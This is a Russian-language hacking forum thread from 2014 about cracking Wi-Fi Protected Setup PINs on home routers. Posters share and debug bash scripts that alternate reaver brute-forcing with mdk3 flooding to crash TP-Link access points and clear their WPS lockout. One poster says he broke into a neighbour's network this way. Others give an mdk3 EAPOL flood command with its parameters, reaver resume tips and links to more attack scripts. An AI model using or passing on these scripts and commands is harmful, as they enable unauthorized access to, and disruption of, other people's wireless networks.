Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    так у меня 2 альфы,одна из которых на том же чипе что и на тп-линк 7200 :) ,так что покупать не надо :)
    Странно.тут писали,что mdk3 может вынудить точку самой перезагрузиться,например когда клиентов на неё навешиваешь :)
    а вообще,это всё равно если и будет получаться,то годы уйдут на это,точка ж не каждую минуту перезагружается :)
    А вот на практике,какая команда лучшая в mdk3?мне понравилась та,которая не даёт подключаться с шифрованием wpa/wpa2,но всё равно никто на wep не переходит :)
    Ну и,за какое время так точка задавалась?сколько пинов в день отдавала? :)
     
    #2061 СЕРЖ32, 31 Aug 2014
    Last edited: 31 Aug 2014
  2. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    а канал точка менять может :) может лучше без канала?я вообще нигде канал не ставлю,что бы автоматом находил,а то точки меняют каналы :)
     
  3. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    5,938
    Reputations:
    57
    Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.
    Вот его код:
    Code:
    #!/bin/sh
    while true;
    # Run reaver to work 50s
    do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
    sleep 4;
    # Run mdk3 to work 10s
    echo [+] Mdk3 is working ...
    timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
    sleep 24;
    done;
    
    У меня он не заработал и я его переделал:
    Code:
    #!/bin/bash
    while true;
    # Run reaver to work 10 pin
    echo
    echo
    echo [+] reaver is working ...
    do
    reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;
    
    # Run mdk3 to work 3s
    echo
    echo
    echo [+] Mdk3 is working ...
    gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
    sleep 3;
    killall mdk3 2> /dev/null;
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
    sleep 14;
    done;
    
    и меньше чем за сутки взломал эту сеть!

    sleep 3 - это сколько секунд шарашит mdk3
    sleep 14 - пауза до появления точки в эфире
    -g 10 - сколько пинов перебирать

    Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.
    Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.
    https://forum.antichat.ru/threads/310835/page-193#post-4037706
     
    #2063 VladimirV, 31 Aug 2014
    Last edited: 18 Jan 2017
    quite gray, pta53-68bis, ms13 and 5 others like this.
  4. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    что то слишком красиво и легко :) ,у меня этот mdk3 никаких проблем никакой точке не доставляет :)
    Это конкретно к тплинкам?а как скрипт на другие точки действует,типа асусов,пробовал?
    Прям так точка и здавалась легко на mdk3?значит точка такая,повезло :) а функция конкретно в скрипте mdk3 какая,навешивание ложных клиентов или деаут клиентов,или какая другая функция?
     
    #2064 СЕРЖ32, 31 Aug 2014
    Last edited: 31 Aug 2014
  5. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    5,938
    Reputations:
    57
    Проверял на точках которые мне доступны - кроме TP-Link ни одна не повелась. И из TP-Link ведется %25-30. Но Это лучше чем ничего!!!
     
  6. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    а не мало ли mdk3 работает?3 сек всего :) что это за точки,которые от 3 сек падать будут :D ,я вон миллионы клиентов цеплял,точкам пофиг,тоже тп линк :)
    Говорю ж....красиво всё как то :) ну или там у тебя такие точки попадаются слабые :)
     
  7. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,015
    Likes Received:
    1,760
    Reputations:
    20
    Все работает как надо, тп линк 740 от скрипта сдулся. Более мощные точки, типа 1043 на левых клиентов ложили свои большие черные.... антенны :D
     
  8. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    вот и я ж говорю :) то какие точки просто,видимо слабые сдуваются только,а мощным,хоть миллиард клиентов вешай :D
    Я ж прочитал скрипт и удивился,что mdk3 3 сек только работает,сколько он клиентов на точку повесит :D ,mdk3 нужно на пол часа оставлять,может и будет эффект :)
     
  9. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    незнаю,что у вас там за точки вокруг слабые,я сейчас скрипт опробывал,в mdk3 время на минуту поставил,и ничего.....
    та я на ночь mdk3 ставил,до десятка миллиона клиентов цеплял на точку(точки)и пофиг точкам :) У вас там просто такие точки,старые наверное,которые от 3 сек mdk3 сдуваются :D
     
  10. UnitUnique

    UnitUnique New Member

    Joined:
    27 Sep 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    подскажите , что делать. нашел пароль (Inflator v 1.0 в нем - Reaver 1.4-r119) - по привычке нажал Ctrl-C, думал скопировать ;), окно естественно закрылось, но при повторном запуске (в нифляторе тут же нажал Run с теми же параметрами без перезапуска последнего) процесс продолжился с 91% и потом пошли пляски 99.99% один и один тот же пин перебирает и ошибки 25 successive start failures. Почему сессия так криво сохранилась ? Тут кто-то команду вроде выкладывал, что якобы должно показать сразу найденный ключ при повторном запуске, не могу найти...

    p.s. добавил --pin xxxxxxxx, теперь опять пошло с 90% и проценты растут, но пин все тот же каждый раз вбивает (wps transaction failed, re-trying last pin), посмотрим, что будет...
     
    #2070 UnitUnique, 1 Sep 2014
    Last edited: 1 Sep 2014
  11. SlNik

    SlNik Active Member

    Joined:
    7 Feb 2014
    Messages:
    307
    Likes Received:
    114
    Reputations:
    1
    Вот засада! Прийдется всё заново пересчитывать!
    А если серьезно, то -p хххх. Вбивай первые ЧЕТЫРЕ цифры подобранного пина, а вторую часть прийдется пересчитать. Это займет не так уж много времени.
    Такие глюки иногда встречаются. Первая часть уже подобрана верно.
     
  12. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    ну что,у кого ещё скрипт работает?(ривер и мдк3)?у меня то скрипт пашет,а толку :) увеличил уже в скрипте продолжительность работы мдк3,точкам всё равно,хоть миллиард клиентов вешай :) Незнаю.....видимо мдк3 действует на какие то древние точки,новым пофиг эти все атаки...
     
  13. UnitUnique

    UnitUnique New Member

    Joined:
    27 Sep 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    спасибо, помогло, странно, что я так не попробовал, тут вроде не раз писалось...
     
  14. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
    что то уже тема мёртвая :) ,видимо потому,что уже wps не актуален,уже у людей новые точки,где wps лочится навсегда,и никакой mdk3 не берёт,и ничего нового придумать не могут,что бы эти локи обойти.....
    Вот тема и не развивается....
     
  15. ivantaan

    ivantaan New Member

    Joined:
    17 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Друзья, есть новая уязвимость WPS у некоторых вендоров, она основана на низкой энтропии при генерации WPS кода на некоторых чипах BroadComm. (Грубо говоря, при каждой перезагрузке точки она генерирует один и тот же пин с большой вероятностью.) На августовской Black Hat 2014 конференции был продемонстрирован подбор WPS кода с 1-10 попыток на точках 2, пока мне неизвестных вендоров.
    Вот презентация частично описывающия уязвимость:
    http://www.engadget.com/2014/08/31/wifi-protected-setup-flaw/
    У когото есть еще инфа?
     
  16. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    82
    Reputations:
    0
  17. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    3,806
    Likes Received:
    13,083
    Reputations:
    352
    В примере показана EAPOL FLOOD ATTACK на точку доступа,
    парень включил ее с нескольких режимов monitor mode (mon1, mon2...)
    Сама атака:
    mdk3 mon0 x 0 -t ff:ff:ff:ff:ff:ff -n "Essid AP" - s 50000

    -t - указываем BSSID Точки доступа
    -n - указываем Названи Точки доступа (ESSID)
    -s - указываем колличество EAPOL пакетов в секунду (в примере их 50000)

    В конце видео показано, что точка перезагружается и wps lock снимается.
     
    _________________________
    #2077 user100, 3 Sep 2014
    Last edited: 3 Sep 2014
    quite gray likes this.
  18. saimonyz

    saimonyz Member

    Joined:
    23 Jun 2012
    Messages:
    162
    Likes Received:
    41
    Reputations:
    2
    вообще можно юзать ReVdK3-r1.sh

    Видео
    https://www.youtube.com/watch?v=zf93xJ7xD2k#t=74
    Скачать
    http://www32.zippyshare.com/v/12811261/file.html
    Почитать
    https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode

    Есть ещё FrankenScript 2 , Atrophy
     
    #2078 saimonyz, 3 Sep 2014
    Last edited: 3 Sep 2014
    quite gray and user100 like this.
  19. chernec

    chernec Member

    Joined:
    7 Oct 2013
    Messages:
    56
    Likes Received:
    10
    Reputations:
    0
    Подскажите, на какой ОС лучше запускать скрипт, на wifislax не получилось, опишите пожалуйста
     
  20. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,015
    Likes Received:
    1,760
    Reputations:
    20
    Смысл в том, что роутер должен не справиться с наплывом желающих присосаться и отправиться в ребут. Тема та же, что и с навешиванием левых клиентов на точку, только работает иначе.
    На кали линукс заработало, но как бы без разницы, на чем его запускать, срабатывает он крайне редко.
     
Loading...